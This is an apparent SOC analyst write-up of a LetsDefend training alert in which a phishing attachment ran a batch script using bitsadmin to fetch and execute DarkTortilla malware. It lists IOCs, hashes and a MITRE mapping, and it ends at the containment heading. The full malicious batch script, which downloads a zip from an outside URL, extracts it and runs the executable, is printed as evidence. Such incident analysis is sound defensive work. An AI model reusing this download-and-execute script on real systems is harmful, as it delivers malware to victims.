// soc investigation 2026-10-07
SOC301 Suspicious BITS Transfer and Execution Detected
letsdefend Medium ✓ true positive
analyst verdict TRUE POSITIVE
✓

SOC301 - Suspicious BITS Transfer and Execution Detected

EventID: 277 · Host: Garnet (172.16.17.71) · User: letsdefend · Time: 2024-07-12 06:09:15 (UTC+3) · Verdict: True Positive

Summary

User on Garnet received a phishing email from [email protected] carrying project2024.zip. Opening it ran project2024.cmd, which used bitsadmin to pull transfer.zip from an S3 bucket, extracted it with 7-Zip and executed transfer.exe. The payload is DarkTortilla, a .NET crypter/loader. Endpoint isolated, scope limited to the single host.

Execution Chain

  1. Phishing email delivers project2024.zip
  2. User executes project2024.cmd
  3. bitsadmin /transfer myDownloadJob downloads transfer.zip to C:\Users\letsdefend\Downloads\
  4. 7z.exe extracts to C:\Users\letsdefend\Downloads\transfer\
  5. transfer.exe launched and confirmed running

batch

@echo off
bitsadmin /transfer myDownloadJob https://files-ld.s3.us-east-2.amazonaws.com/transfer.zip C:\Users\letsdefend\Downloads\transfer.zip
"C:\Program Files\7-Zip\7z.exe" x "C:\Users\letsdefend\Downloads\transfer.zip" -o"C:\Users\letsdefend\Downloads\transfer\"
cd C:\Users\letsdefend\Downloads\transfer
transfer.exe

Admin or Attacker?

The L1 couldn’t call it. The chain answers it: BITS was invoked by a batch file from an emailed archive, dropped into a user Downloads folder, and the payload ran immediately. Nothing about that matches admin tooling.

MITRE ATT&CK

TechniqueTacticNameEvidence
T1566.001Initial AccessSpearphishing Attachmentproject2024.zip from maidtimepro.com
T1204.002ExecutionUser Execution: Malicious FileUser ran project2024.cmd (analyst addition)
T1059.003ExecutionWindows Command ShellBatch script drives the chain
T1197Defense EvasionBITS JobsmyDownloadJob via bitsadmin
T1105Command and ControlIngress Tool Transfertransfer.zip pulled from S3

IOCs

TypeValue
Sendersupport[@]maidtimepro[.]com
URLhxxps://files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/transfer[.]zip
SHA256 (project2024.zip)f610fb4665740cf5d78db885529dd0e84fbd43ae1088642f2ebfe307f21d1b6c
SHA256 (transfer.exe)aea48d054d3c5d517a680e92dea37a34b84543c343ec9227b6b637a1dcc74e91
HostGarnet / 172[.]16[.]17[.]71

🔬 Analysis Reports 🦠 VirusTotal https://www.virustotal.com/gui/url/58e07c394b7178e859796ca153e9c120c7647a6e117675d71f11e1a7fbbe5482/detection https://www.virustotal.com/gui/domain/maidtimepro.com https://www.virustotal.com/gui/file/aea48d054d3c5d517a680e92dea37a34b84543c343ec9227b6b637a1dcc74e91

Containment and Recommendations